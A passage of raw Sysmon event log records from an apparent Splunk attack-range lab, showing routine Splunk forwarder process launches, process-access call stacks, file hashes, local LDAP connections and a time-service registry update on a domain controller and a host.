32\ntdll.dll+51791 10341000x8000000000000000286882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:01.713{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1069-6216-E904-000000003802}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:01.713{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1069-6216-E904-000000003802}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:01.714{C8EA50B7-1069-6216-E904-000000003802}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:01.244{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94226BB89E8B87C9B9745D75F13FDCED,SHA256=55FEDB3E50F23A7C987A6CDF15207A3A043245258017133EA73C39ED7D72D0F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:02.148{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E1A70D6712185EF5F3CFB09471B2CF,SHA256=5CDBBE2BF61F43140157D51CD0E22DAF880BA9CA527379C14E5994666F4DD5ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:02.323{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-106A-6216-EA04-000000003802}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:02.323{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:02.323{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:02.323{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:02.323{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:02.323{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-106A-6216-EA04-000000003802}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:02.323{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-106A-6216-EA04-000000003802}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:02.323{C8EA50B7-106A-6216-EA04-000000003802}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:02.244{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6240213FD30609C8DBF81797930C1489,SHA256=D42A9071A956648ACC15B38D428BD34C6C970AF08E2D5222C6CE9EC6A5CA02CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:02.104{C8EA50B7-1069-6216-E904-000000003802}60084456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000286899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:00.671{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53369-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:03.260{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D893673CEA6A5E686568859056A303A0,SHA256=6EB01CA5C782F659E2BB9C96FD194B18AE2B01948F0B18082BDF50EAA5B0F252,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:03.148{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A0B67E8FC8F385ECD91D2D7538E5597,SHA256=14CF7CB6013EA899200538EAB9541D8563D18FEEBA70D5CEDD1783C7B490FEF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:04.276{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76558CD1A04C6101EFD0C7FA5D0843F0,SHA256=5BA3E34F4E3DE17EE00955C5CD9E151A2B4A6E13F2CE1BFFC350DD051901DF2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:04.194{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBA6D167C38C38DFED6282257FEC59CB,SHA256=E74023FCEC872E73BC0A0E15AEBB51EE8650168B10D3003F9934665F47D21E3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:04.088{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-106C-6216-EB04-000000003802}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:04.088{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:04.088{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:04.088{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:04.088{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:04.088{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-106C-6216-EB04-000000003802}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:04.088{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-106C-6216-EB04-000000003802}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:04.089{C8EA50B7-106C-6216-EB04-000000003802}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:05.288{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F69E3D4B9A1EE20E89354309C18FEDC2,SHA256=F4055934052BEF086427C55ADB3221FBB9231E27280D70A69F4D018155A0C4B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:03.171{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53370-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:03.171{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53370-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 13241300x8000000000000000286910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:46:05.448{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a2-0x8ee2f7c6) 23542300x8000000000000000286909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:05.307{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56F5FC22D6285F05C5878FD6B6B699DB,SHA256=537C9ED10425B441C8A1E6C85F38C3FBE458D13BC5200F6CF9C9CB5B4118DFFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:06.335{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=005980220BF39FAF0D85B3658BFA2C4A,SHA256=33E8836F2CFBCB5C5CA98B996D90E59701F699725392B8C5A80A4B2FBBA0FA5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:06.338{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 